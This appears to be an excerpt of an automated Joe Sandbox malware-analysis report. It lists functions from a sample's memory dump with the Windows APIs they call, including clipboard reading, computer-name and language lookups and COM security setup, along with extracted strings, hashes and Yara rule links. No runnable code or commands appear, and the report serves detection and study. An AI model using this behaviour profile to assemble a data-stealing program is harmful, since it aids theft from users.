Function 004423C5 Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 004423C5
GetForegroundWindow.USER32 ref: 004423E0

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
Instruction ID: 3f5cde6939bccaa2b971e6e0c262a6c41a2af89a1d69f81b939c4d59ebd80ce7
Opcode Fuzzy Hash: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
Instruction Fuzzy Hash: D3D0A7BDD114104BB2559720BC0E45F36119B9B20A304443CE4070121BEA35118E868E

Function 00436312 Relevance: 1.7, APIs: 1, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 004363C4

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: ef8483e8ab778255dd258931c3d82cf31cc5b03f09e4434ba3215fbb1080e3d0
Instruction ID: 95046018421402d0801aebd9565f509305716e141edef8233f74c498256fed45
Opcode Fuzzy Hash: ef8483e8ab778255dd258931c3d82cf31cc5b03f09e4434ba3215fbb1080e3d0
Instruction Fuzzy Hash: 8F811A20108FC2CED332867C8948747BFD15B27228F484B9DD5E64BBD2D2AAB509C766

Function 0042F222 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,D3BAB492,00000100), ref: 0042F301

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 5f99d4ff4f8377a95cea722d27edd5ab8b31f14781de5b973d5a456a3fa85f19
Instruction ID: 2bea6ffdc9a5f01b0fb38135ff7c329ec52023607b2de6582bc56e9ec8f1d5ec
Opcode Fuzzy Hash: 5f99d4ff4f8377a95cea722d27edd5ab8b31f14781de5b973d5a456a3fa85f19
Instruction Fuzzy Hash: 5A218E3460D3D28BD774CF25D4987EBB7E0AB86304F54896DC4D987281CA75580ACB96

Function 0043B967 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0043B996

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 98e9cfe35c1bf7e059ea3f603ca1750e6c53937badd962860f9777bb0233e5b3
Instruction ID: 791500818c7a1469a8ddc9d1224b017d77911d2958c513979461ec400309f230
Opcode Fuzzy Hash: 98e9cfe35c1bf7e059ea3f603ca1750e6c53937badd962860f9777bb0233e5b3
Instruction Fuzzy Hash: 4B219F71A046418FD714CF38C994B99BBF1AB5A310F0982D9D1A5DB3E2D7388D408F51

Function 00442020 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040BC80,00000000,00000000), ref: 00442052

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ea8428d80ce760913c6091ce044fd24d24df86904107ae5a33981043699a0a50
Instruction ID: ce4dc6f8cea40f70218e043c946db7baefed7d7f927e290f9bf4e18e7a102a01
Opcode Fuzzy Hash: ea8428d80ce760913c6091ce044fd24d24df86904107ae5a33981043699a0a50
Instruction Fuzzy Hash: 95E02B72514210ABF2101F387C05B1736749FC2715F054436F601A3111D739E811C19E

Function 00437180 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004371C9

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 1eee05ed824ab0fad7e0fec43f832c4afae3966b95aa27efb02f9f36988d2f71
Instruction ID: 81660e69c17f0543e92a0099c1eb05d4904c421e706bb06363d2a5bfa495106c
Opcode Fuzzy Hash: 1eee05ed824ab0fad7e0fec43f832c4afae3966b95aa27efb02f9f36988d2f71
Instruction Fuzzy Hash: B9F0B7742497028FD355DF68C5A471BBBE0EF49304F01882CE5A68B290CBB5A948CF82

Function 00434865 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004348AD

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 53b3cb3652385e22ea377a8ab379108a4fc6dc91706275fd2e50ee136dcc3ceb
Instruction ID: d7c258c8275f3fac7a4ea29dfb35da0c5007ac1f08ebe8bc9e26289c7763600b
Opcode Fuzzy Hash: 53b3cb3652385e22ea377a8ab379108a4fc6dc91706275fd2e50ee136dcc3ceb
Instruction Fuzzy Hash: C5F0A5B02087028FE310DF25C5A974FBBE5BB81348F11890DE5A54B291C7FA96898FC6

Function 0040D400 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D413

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
Instruction ID: 5b8c1c1c38bc235c753b9088e917c06d101502a7d4806eff28edba5b46e46085
Opcode Fuzzy Hash: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
Instruction Fuzzy Hash: 32D05E7565014477D2146B18EC47F563658970375AF000229F663C65D1D910A915E569

Function 0040D433 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D445

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
Instruction ID: f87055a7ed73e73a39e7b0bf2bc1a884afc0d8708234b3b1202e7b1dbc502a37
Opcode Fuzzy Hash: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
Instruction Fuzzy Hash: 52D0C9787D8305B7F6685B18EC17F1632505306F61F340229B366FF6D0C9D07901961C

Function 004404E2 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 004404FD

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
Instruction ID: e6622cb3e0fd9e941ff1a23b217b6006838c210e8ccdd082eec4ddb73310e109
Opcode Fuzzy Hash: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
Instruction Fuzzy Hash: 4AC08C31504922EBC7102F28BC16BC63A14EF02762F0748B1F000A90B5C728EC91C9D8

Function 004404B0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,00000001,00408C27,FDFCE302), ref: 004404C0

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
Instruction ID: a3e7d273c8645b615fb13e0d68042f64d6ea605513032f2b713a79b74872f641
Opcode Fuzzy Hash: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
Instruction Fuzzy Hash: CFC04871045220ABDA502B25EC09BCA3A68AF46662F0280A6B044A70B2C760AC82CA98

Non-executed Functions

Function 004127E0 Relevance: 183.9, APIs: 3, Strings: 101, Instructions: 1937COMMON

Download Yara Rule

Strings

t, xrefs: 00413EB5
L, xrefs: 00413594
m, xrefs: 00413E7D
,, xrefs: 00413716
a, xrefs: 00413158
$, xrefs: 00413756
D, xrefs: 004145EE
v, xrefs: 00413188
`, xrefs: 00413810
p, xrefs: 00413ED5
$, xrefs: 004139A3
-, xrefs: 00414152
H, xrefs: 0041416A
N, xrefs: 00412E53
q, xrefs: 00413D24
, xrefs: 00413736
@, xrefs: 004141AA
y, xrefs: 00413E1D
L, xrefs: 0041328E
w, xrefs: 00413571
(, xrefs: 00413EFD
L, xrefs: 0041414A
D, xrefs: 00412FAA
f, xrefs: 00413168
., xrefs: 00413B5A
V, xrefs: 004140FA
X, xrefs: 004140EA
T, xrefs: 0041410A
M, xrefs: 00413599
b, xrefs: 00413F45
F, xrefs: 0041417A
$, xrefs: 0041340E
8, xrefs: 00413B16
B, xrefs: 00413576
", xrefs: 0041358F
", xrefs: 00413726
N, xrefs: 0041413A
P, xrefs: 0041412A
]ZN, xrefs: 004142B1
1, xrefs: 00413332
0, xrefs: 00413B4A
@, xrefs: 00413580
%, xrefs: 00413416
<, xrefs: 00413B02
|, xrefs: 00413EF5
E, xrefs: 00412FB2
!, xrefs: 004141C2
A, xrefs: 00412B95
x, xrefs: 00413F15
>, xrefs: 00413AF8
z, xrefs: 00413F05
6, xrefs: 004133FE
(, xrefs: 00413D95
T, xrefs: 00413138
2, xrefs: 00413B3A
:, xrefs: 00414212
v, xrefs: 00413EA5
3, xrefs: 00412ADE
0, xrefs: 0041332A
', xrefs: 0041374E
w, xrefs: 00413D1A
^, xrefs: 004140BA
4, xrefs: 004141D2
Q, xrefs: 00412921
Z, xrefs: 004140DA
f, xrefs: 00413F25
=, xrefs: 0041299B
r, xrefs: 00413EC5
p, xrefs: 00413D1F
+, xrefs: 00413406
:, xrefs: 00413B0C
N, xrefs: 0041358A
W, xrefs: 00413322
B, xrefs: 0041419A
S, xrefs: 00413289
]ZN, xrefs: 004142C8
J, xrefs: 0041415A
]ZN, xrefs: 004142B8
&, xrefs: 00413746
D, xrefs: 0041418A
~, xrefs: 00413EE5
., xrefs: 0041357B
d, xrefs: 00413F35
6, xrefs: 0041333A
4, xrefs: 00413B2A
e, xrefs: 00413F3D
\, xrefs: 004140CA
J, xrefs: 0041359E
D, xrefs: 0041436D
8, xrefs: 00414202
+, xrefs: 004141E2
z, xrefs: 00412FBA
!, xrefs: 004141B2
q, xrefs: 00413284
6, xrefs: 00413B20
*, xrefs: 00413D85
', xrefs: 00412C44
R, xrefs: 00413E2D
9, xrefs: 00413585
R, xrefs: 0041411A
1, xrefs: 00413B52

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: $ ]ZN$ ]ZN$ ]ZN$!$!$"$"$$$$$$$%$&$'$'$($($*$+$+$,$-$.$.$0$0$1$1$2$3$4$4$6$6$6$8$8$9$:$:$<$=$>$@$@$A$B$B$D$D$D$D$E$F$H$J$J$L$L$L$M$N$N$N$P$Q$R$R$S$T$T$V$W$X$Z$\$^$`$a$b$d$e$f$f$m$p$p$q$q$r$t$v$v$w$w$x$y$z$z$|$~
API String ID: 0-299570860
Opcode ID: f5b952a7fa576cf3fac9bc8395e035e8ba89dd158049201593eea142aec36e13
Instruction ID: 11c8b48c8f4a98f758d37e8cd5808665052ec381988852a9cf89f45dba9536ca
Opcode Fuzzy Hash: f5b952a7fa576cf3fac9bc8395e035e8ba89dd158049201593eea142aec36e13
Instruction Fuzzy Hash: CF03B07010C7C08AD3259B38C5883EFBFD1AB96314F188A6EE5E9873D2D7798585871B

Function 0041DE90 Relevance: 123.7, Strings: 98, Instructions: 1234COMMON

Download Yara Rule

Strings

*, xrefs: 0041E140
d, xrefs: 0041E392
?, xrefs: 0041E5FB
?, xrefs: 0041E5DB
w, xrefs: 0041E44B
N, xrefs: 0041E400
(, xrefs: 0041E4E3
(, xrefs: 0041E379
:, xrefs: 0041E483
E, xrefs: 0041EB91
L, xrefs: 0041E3C9
L, xrefs: 0041E45F
~, xrefs: 0041E45A
L, xrefs: 0041E40F
?, xrefs: 0041E3EC
|, xrefs: 0041E405
4, xrefs: 0041E1E2
V, xrefs: 0041E39C
<, xrefs: 0041E3BA
C, xrefs: 0041E3D3
i, xrefs: 0041EBB4
Z, xrefs: 0041E3F6
F, xrefs: 0041E61B
u, xrefs: 0041E42D
9, xrefs: 0041E5BB
x, xrefs: 0041E441
{, xrefs: 0041E4EB
>, xrefs: 0041E432
g, xrefs: 0041EBA5
o, xrefs: 0041EBBE
v, xrefs: 0041E513
u, xrefs: 0041E118
7, xrefs: 0041E1DA
U, xrefs: 0041E473
u, xrefs: 0041E455
\, xrefs: 0041E128
q, xrefs: 0041F042
&, xrefs: 0041E1EA
|, xrefs: 0041E158
p, xrefs: 0041E428
q, xrefs: 0041E3D8
b, xrefs: 0041E46E
., xrefs: 0041E148
h, xrefs: 0041E3AB
t, xrefs: 0041E1FA
l, xrefs: 0041E0D8
c, xrefs: 0041E503
k, xrefs: 0041E4BB
c, xrefs: 0041E437
P, xrefs: 0041E388
!, xrefs: 0041E4D3
X, xrefs: 0041E120
[, xrefs: 0041EB87
p, xrefs: 0041E50B
e, xrefs: 0041EBA0
I, xrefs: 0041E573
z, xrefs: 0041E450
g, xrefs: 0041E543
Z, xrefs: 0041E3A6
t, xrefs: 0041E43C
B, xrefs: 0041E3CE
h, xrefs: 0041E446
H, xrefs: 0041E3E2
R, xrefs: 0041E40A
G, xrefs: 0041F03A
s, xrefs: 0041E108
S, xrefs: 0041E3BF
d, xrefs: 0041EB9B
S, xrefs: 0041E3C4
S, xrefs: 0041E48B
C, xrefs: 0041E3DD
k, xrefs: 0041EBAA
], xrefs: 0041E160
~, xrefs: 0041E100
`, xrefs: 0041E53B
L, xrefs: 0041E603
g, xrefs: 0041E383
', xrefs: 0041E138
c, xrefs: 0041E423
F, xrefs: 0041EB96
J, xrefs: 0041E3E7
6, xrefs: 0041E5EB
G, xrefs: 0041E5C3
L, xrefs: 0041E414
i, xrefs: 0041EBB9
/, xrefs: 0041E533
4, xrefs: 0041E464
?, xrefs: 0041E5F3
y, xrefs: 0041E613
}, xrefs: 0041E110
k, xrefs: 0041E60B
{, xrefs: 0041E52B
D, xrefs: 0041E3FB
Q, xrefs: 0041E3A1
T, xrefs: 0041E38D
[, xrefs: 0041E397
D, xrefs: 0041EB8C
{, xrefs: 0041EBAF

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: !$&$'$($($*$.$/$4$4$6$7$9$:$<$>$?$?$?$?$B$C$C$D$D$E$F$F$G$G$H$I$J$L$L$L$L$L$N$P$Q$R$S$S$S$T$U$V$X$Z$Z$[$[$\$]$`$b$c$c$c$d$d$e$g$g$g$h$h$i$i$k$k$k$l$o$p$p$q$q$s$t$t$u$u$u$v$w$x$y$z${${${$|$|$}$~$~
API String ID: 0-1873956536
Opcode ID: fc18553a73c8fd4dc2fea3a9f9035c4283c881730360b760b769bf46582e99ae
Instruction ID: 931559f782a0dae5da6d3a2348cda9da3af0ea84656c223040a8e2c7efec153d
Opcode Fuzzy Hash: fc18553a73c8fd4dc2fea3a9f9035c4283c881730360b760b769bf46582e99ae
Instruction Fuzzy Hash: DAB28F3160C7C08BD325DA38C85439FBBD1ABD6324F184A6DE8E98B3C2D6799849C757

Function 0042621B Relevance: 33.7, Strings: 26, Instructions: 1202COMMON

Download Yara Rule

Strings

3416, xrefs: 004273A5
:vt, xrefs: 00426872
'Y<[, xrefs: 00426A70
2{<u, xrefs: 00426E06
zx, xrefs: 0042661B
qVol, xrefs: 004272F5, 0042730C, 004273DA, 004273EA
F;D, xrefs: 00426431
6fd, xrefs: 00426846
Ta\c, xrefs: 00426AB2
7J0H, xrefs: 00426452
Z[, xrefs: 00426E5E
Teg, xrefs: 00426ABD
nl, xrefs: 0042663C
jh, xrefs: 00426647
N>_<, xrefs: 00426560
wDuJ, xrefs: 004270A8
3416, xrefs: 004275C5
2U/W, xrefs: 00426A91
{HyN, xrefs: 004270B3
s@qF, xrefs: 0042700F
Vt%t, xrefs: 00426E81
7w, xrefs: 00426E11
zx, xrefs: 00426426
(]2_, xrefs: 00426A7B
bxB, xrefs: 00427850
SP, xrefs: 004270C9

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: F;D$zx$'Y<[$(]2_$2U/W$2{<u$3416$3416$6fd$7J0H$7w$:vt$N>_<$SP$Ta\c$Teg$Vt%t$Z[$bxB$qVol$s@qF$wDuJ${HyN$jh$nl$zx
API String ID: 0-2025997952
Opcode ID: d34ec39eb96bb7efa42d43d0cecc10ce8a4047bc9737a28ca6cdc305126fa738
Instruction ID: 8ebcec6048e81b7414bf2c44ea1e9f7dace67e943cef4cf10300ed7be7304af5
Opcode Fuzzy Hash: d34ec39eb96bb7efa42d43d0cecc10ce8a4047bc9737a28ca6cdc305126fa738
Instruction Fuzzy Hash: D1B273B160C3918BD334CF14D8417ABBBF2FB95304F44892DD4C99B252D7798A4ADB8A

Function 00417222 Relevance: 25.6, APIs: 4, Strings: 10, Instructions: 1137COMMON

Download Yara Rule

Strings

7, xrefs: 00417D7E
), xrefs: 0041747C
WH, xrefs: 00417D6E
ruA, xrefs: 0041755F
*, xrefs: 00418053
TW, xrefs: 00417D76
>gVf, xrefs: 00417278, 004172A4
}&'$, xrefs: 00417BD7
pA, xrefs: 004176B7
X2c0, xrefs: 00417775

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: pA$)$*$7$>gVf$TW$WH$X2c0$ruA$}&'$
API String ID: 0-2465278142
Opcode ID: 066c8ce5b71a5b696cd3803d73cf449c38db815dbdda3cc7b9b4004b6f854aec
Instruction ID: db295268db8bdf45a891635b6dee4b286def9570c954afad4e7b9bb962e3f9ad
Opcode Fuzzy Hash: 066c8ce5b71a5b696cd3803d73cf449c38db815dbdda3cc7b9b4004b6f854aec
Instruction Fuzzy Hash: 947211756483528BD324CF28C8917ABBBF1FF95314F18896DE4C58B3A1E7388945CB86

Function 0041618C Relevance: 14.8, Strings: 11, Instructions: 1044COMMON

Download Yara Rule

Strings

fjM, xrefs: 00416B0D
6y, xrefs: 00416278
pSlM, xrefs: 00416406
6, xrefs: 00416C5B
YjM, xrefs: 00416BF6
YjM, xrefs: 00416B56
EnA, xrefs: 00416E3F
{, xrefs: 00416299
yx, xrefs: 0041628E
y~, xrefs: 00416283
fjM, xrefs: 00416BB3

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: 6$6y$EnA$YjM$YjM$fjM$fjM$pSlM$yx$y~${
API String ID: 0-2342033412
Opcode ID: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
Instruction ID: a2001c8a8adb2b8dbf3dd01cda6d968c98786edfc2a21b29c8f54ffb17cc71b7
Opcode Fuzzy Hash: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
Instruction Fuzzy Hash: 9762E3741083418FE724CF25C891BAB77E1FF86314F15496DE0D69B2A2D738D84ACB9A

Function 00411BDE Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 555COMMON

Download Yara Rule

Strings

$, xrefs: 0041203F
5, xrefs: 0041219B
t, xrefs: 00411C84
J, xrefs: 00411BF1
&, xrefs: 00412044
A, xrefs: 00411FB9

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: $$&$5$A$J$t
API String ID: 0-1619763526
Opcode ID: 2bdb521bc7c73c0b7c7245bb86837fa704f627e98ff44684887737040ddb6845
Instruction ID: a53242e4cf12c94eabb5fc35352f39a952aaa25ff7b8dface19663bb3d57fcdd
Opcode Fuzzy Hash: 2bdb521bc7c73c0b7c7245bb86837fa704f627e98ff44684887737040ddb6845
Instruction Fuzzy Hash: FB22B07160C7808BC7249B38C5943AFBBE1ABC5324F184A2EE9E9D73C1D77889458B47

Function 00409B70 Relevance: 11.7, Strings: 9, Instructions: 418COMMON

Download Yara Rule

Strings

VW, xrefs: 00409F9D
UJVM, xrefs: 00409D7E
b, xrefs: 00409E73
~9, xrefs: 00409F05
]NGD, xrefs: 00409D94
A0CAAC5595236522822D1F4978021086, xrefs: 00409C45
EVA^, xrefs: 00409D89
W, xrefs: 00409C13
yD, xrefs: 00409CEB

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: A0CAAC5595236522822D1F4978021086$EVA^$UJVM$VW$W$]NGD$b$~9$yD
API String ID: 0-452750746
Opcode ID: 63948a1a35424d92484af45aa3e419c807616ca0303279be93579cff46dd4037
Instruction ID: ffcda9fbc27d5fd1cec50cde84d534a082da3ff5d4e5b8e77816747385cb8e1d
Opcode Fuzzy Hash: 63948a1a35424d92484af45aa3e419c807616ca0303279be93579cff46dd4037
Instruction Fuzzy Hash: 82E1D1715083808BD724CF24C8947ABBBE2FFD5308F08892DE4D99B392DB798509CB56

Function 0040B280 Relevance: 10.4, Strings: 8, Instructions: 384COMMON

Download Yara Rule

Strings

)Ku, xrefs: 0040B43B
c[G, xrefs: 0040B2BB
DM_e, xrefs: 0040B362, 0040B513
x[G, xrefs: 0040B350
SV, xrefs: 0040B66F
ox}k, xrefs: 0040B6B2, 0040B6A6, 0040B742, 0040B76C, 0040B5A4, 0040B695, 0040B739, 0040B550, 0040B725
UGEA, xrefs: 0040B292
S;G%, xrefs: 0040B3DB

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
API String ID: 0-3323421312
Opcode ID: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
Instruction ID: 7fd46061e40033794bbc6c3ce90a1e611a10dbdcf815d020572bc93dee4dedaf
Opcode Fuzzy Hash: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
Instruction Fuzzy Hash: 55D1F57150C3408BD724CF29845476BFBE2EFD1708F18896DE4D56B385D77A890A8B8B

Function 00409360 Relevance: 10.3, Strings: 8, Instructions: 272COMMON

Download Yara Rule

Strings

Y, xrefs: 004094DE
ID, xrefs: 004093E2
ADTD, xrefs: 00409428
vxtq, xrefs: 00409440
eMOK, xrefs: 004093F0
E, xrefs: 00409388
vu, xrefs: 004094D7
|xzy, xrefs: 00409438

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
API String ID: 0-1466227541
Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
Instruction ID: 68c016febbe7a0715404e25fe2d2c1f5bf377f828986e49a58439a2b7b357855
Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
Instruction Fuzzy Hash: 7871E23158C3928AD3118F7AC4A076BFFE09FA2350F1C496DE4D45B392D37989099B9A

Function 0042A7F0 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 573COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042A8F7
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042A9CF

Strings

*, xrefs: 0042AB95, 0042AA60, 0042AA93
q, xrefs: 0042ADA6
*, xrefs: 0042AC00

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: *$*$q
API String ID: 237503144-4001757600
Opcode ID: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
Instruction ID: 6a2a75fc59155a11c5aec0aea031f7e0da65668b1aff7312ce30b4a80edc4f4b
Opcode Fuzzy Hash: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
Instruction Fuzzy Hash: 130212B56083158FD724CF28D89135FB7E1FFC5308F05892DE9999B291DB78890ACB86

Function 00409660 Relevance: 9.2, Strings: 7, Instructions: 448COMMON

Download Yara Rule

Strings

$i|3, xrefs: 00409811
?+9&, xrefs: 00409809
)--l, xrefs: 00409819
4?!;, xrefs: 004097F1
9;#&, xrefs: 00409801
K, xrefs: 00409A9E
6?34, xrefs: 004096B0

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: $i|3$)--l$4?!;$6?34$9;#&$?+9&$K
API String ID: 0-2829372548
Opcode ID: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
Instruction ID: 6807048b151084a9e8e11973f3dfbc4b5eda1ab4f65a555cc9214e5bb2479a1e
Opcode Fuzzy Hash: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
Instruction Fuzzy Hash: 2DD1247120C7818BD729CF29C45036BBFE1AB97314F0889AED0D5DB382DA3D8909C756

Function 00437A60 Relevance: 9.1, APIs: 6, Instructions: 119clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00437A74
GetClipboardData.USER32 ref: 00437A8F
GlobalLock.KERNEL32 ref: 00437AAE
GlobalUnlock.KERNEL32 ref: 00437BE6
CloseClipboard.USER32 ref: 00437BF1

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
